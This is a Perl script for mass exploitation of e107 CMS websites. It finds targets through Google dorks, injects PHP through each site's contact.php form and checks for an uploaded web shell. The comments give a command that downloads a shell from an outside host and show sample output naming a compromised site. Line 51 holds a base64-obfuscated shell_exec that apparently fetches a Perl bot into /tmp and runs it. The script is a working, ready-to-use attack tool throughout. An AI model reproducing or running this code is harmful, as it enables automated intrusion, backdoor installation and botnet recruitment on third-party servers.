  1. #!/usr/bin/perl
  2. # Author: skpx
  3. # e107 mass scanner/shell uploader
  4. # http://www.exploit-db.com/exploits/12715
  5. #
  6. # Change it to whatever
  7. # passthru() command:
  8. # echo "tEStVulN";
  9. # uname -a;
  10. # php -r '$s=@file_get_contents("http://www.yucatekisimo.com/language/shell.txt");$f=@fopen("help_us.php","w");fputs($f,$s);fclose($f);';
  11. # echo "TesTvULn"
  12. #
  13. # If it prints the uname but not a shell match change the cmd to whatever (wget, curl, etc).
  14. #
  15. # http://www.omni-bot.de/e107/contact.php
  16. # [!] Site vulnerable...
  17. # Linux corwin 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 GNU/Linux
  18. # [!] PHP Shell: http://www.omni-bot.de/e107/help_us.php
  19. #
  20. use strict;
  21. use warnings;
  22. use LWP::UserAgent;
  23. use URI::Escape;
  24.     my @tld = qw { ad ae am as at az ba be bf
  25.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  26.     co.bw co.ck co.cr co.id co.il co.in co.jp
  27.     co.ke co.kr co.ls com co.ma com.af com.ag
  28.     com.ai com.ar com.au com.bd com.bh com.bn
  29.     com.bo com.br com.by com.bz com.co com.cu
  30.     com.do com.ec com.eg com.et com.fj com.gh
  31.     com.gi com.gt com.hk com.jm com.kh com.kw
  32.     com.lb com.ly com.mt com.mx com.my com.na
  33.     com.nf com.ng com.ni com.np com.om com.pa
  34.     com.pe com.ph com.pk com.pr com.py com.qa
  35.     com.sa com.sb com.sg com.sl com.sv com.tj
  36.     com.tr com.tw com.ua com.uy com.vc com.vn
  37.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  38.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  39.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  40.     gy hn hr ht hu ie im is it it.ao je jo kg
  41.     ki kz la li lk lt lu lv md me mg mk ml mn
  42.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  43.     rs ru rw sc se sh si sk sm sn st td tg tk
  44.     tl tm to tt vg vu ws };
  45.  
  46.     my $term = shift;
  47.     my $rand_tld = rand($#tld);
  48.  
  49. my $dork  = "\"Powered by e107\"+".$tld[$rand_tld];
  50. my $match = "AtlantiQ";
  51. my $cmd   = "shell_exec(base64_decode(\"d2dldCBodHRwOi8venVvLnBvZGdvcnoub3JnL3p1by9zaGIucGwgLU8gL3RtcC9ibztwZXJsIC90bXAvYm8=\"));";
  52. my $log   = "e107-rce-sites.txt";
  53.  
  54. google_search($dork);
  55.  
  56. sub google_search {
  57.  
  58.     # http://www.google.com/supported_domains
  59.     my @tld = qw { ad ae am as at az ba be bf
  60.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  61.     co.bw co.ck co.cr co.id co.il co.in co.jp
  62.     co.ke co.kr co.ls com co.ma com.af com.ag
  63.     com.ai com.ar com.au com.bd com.bh com.bn
  64.     com.bo com.br com.by com.bz com.co com.cu
  65.     com.do com.ec com.eg com.et com.fj com.gh
  66.     com.gi com.gt com.hk com.jm com.kh com.kw
  67.     com.lb com.ly com.mt com.mx com.my com.na
  68.     com.nf com.ng com.ni com.np com.om com.pa
  69.     com.pe com.ph com.pk com.pr com.py com.qa
  70.     com.sa com.sb com.sg com.sl com.sv com.tj
  71.     com.tr com.tw com.ua com.uy com.vc com.vn
  72.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  73.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  74.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  75.     gy hn hr ht hu ie im is it it.ao je jo kg
  76.     ki kz la li lk lt lu lv md me mg mk ml mn
  77.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  78.     rs ru rw sc se sh si sk sm sn st td tg tk
  79.     tl tm to tt vg vu ws };
  80.  
  81.     my $term = shift;
  82.     my $rand_tld = rand($#tld);
  83.     my $inc = 10;
  84.     my $maxpages = 1024;
  85.     my @links;
  86.     for (my $pagenum = 0;$pagenum <= $maxpages;$pagenum += $inc) {
  87.         my $url = "http://www.google.".$tld[$rand_tld]."/search?q=".uri_escape($term)."&num=100&filter=0&start=".$pagenum;
  88.         my $query = send_query($url);
  89.         while ($query =~ m!href="(https?:\/\/[^>"]*)"!g) {
  90.             if ($1 !~ m!(google|googleusercontent)!) {
  91.                 my $rawlink = $1;
  92.                 my @process=process_links($rawlink);
  93.                 push(@links, @process);                
  94.             }
  95.         } sleep(2);
  96.     } return @links;
  97. }
  98.  
  99. sub send_query {
  100.  
  101.     my $url = shift;
  102.     my $ua = LWP::UserAgent->new or die;
  103.     $ua->agent('NULL');
  104.     $ua->timeout(10);
  105.  
  106.     my $req = HTTP::Request->new(GET => $url);
  107.     my $res = $ua->request($req);
  108.  
  109.     print $url . "\n";
  110.     return $res->content;
  111. }
  112.  
  113. sub process_links {
  114.  
  115.     my @links = shift;
  116.     my @xplurl;
  117.         foreach my $inc (@links) {
  118.         $inc =~ s!%3a!:!gi;
  119.         $inc =~ s!%3f!\/!gi;
  120.         if ($inc =~ m!e107_plugins!g) {
  121.             $inc =~ s!(e107_plugins)[^A-Za-z0-9].*$!!g;
  122.             push(@xplurl, $inc);
  123.         } else {
  124.             $inc =~ s!(https?:\/\/[^\/]+\/?)[^\s]+!$1!;
  125.             push(@xplurl,$inc);
  126.         }
  127.     } exploit_host(@xplurl);
  128. }
  129.  
  130. sub exploit_host {
  131.  
  132.     my @host = shift;
  133.     foreach my $inc (@host) {  
  134.         my $ua = LWP::UserAgent->new or die;
  135.         $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  136.         $ua->timeout(10);
  137.        
  138.         my $xpl = $inc . "/contact.php";
  139.         $xpl =~ s/\/\/contact.php/\/contact.php/g;
  140.         my $req = HTTP::Request->new(POST => $xpl);
  141.         $req->content_type('application/x-www-form-urlencoded');
  142.         $req->content("send-contactus=1&author_name=%5Bphp%5D" .$cmd. "%3Bdie%28%29%3B%5B%2Fphp%5D");
  143.        
  144.         my $res = $ua->request($req);
  145.         print $xpl . "\n";
  146.         my $cont = $res->content;
  147.         if ($cont =~ m!tEStVulN\n(.*)!g) {
  148.             my $uname = $1;
  149.             print "[!] Site vulnerable...\n";
  150.             print $uname . "\n";
  151.             # Write to logfile
  152.             open my $lh, '>>', $log or die $!;
  153.             print $lh "$xpl\n";
  154.             print $lh "$uname\n";
  155.             print $lh "-" x 35 . "\n";
  156.             close $lh or die $!;
  157.         } check_shell($xpl);
  158.     } sleep(1);
  159. }
  160.  
  161. sub check_shell {
  162.  
  163.     my $gotsh = shift;
  164.     $gotsh =~ s!contact\.php!help_us\.php!;
  165.  
  166.     my $ua = LWP::UserAgent->new or die;
  167.     $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  168.     $ua->timeout(10);
  169.  
  170.     my $surl = $gotsh;
  171.     my $req = HTTP::Request->new(GET => $surl);
  172.  
  173.     my $res = $ua->request($req);
  174.     my $cont = $res->content;
  175.     if ($cont =~ m!$match!) {
  176.         print "[!] PHP Shell: " .$surl. "\n";
  177.         # Write to logfile
  178.         open my $lh, '>>', $log or die $!;
  179.         print $lh "$surl\n";
  180.         print $lh "-" x 35 . "\n";
  181.         close $lh or die $!;
  182.     }
  183. }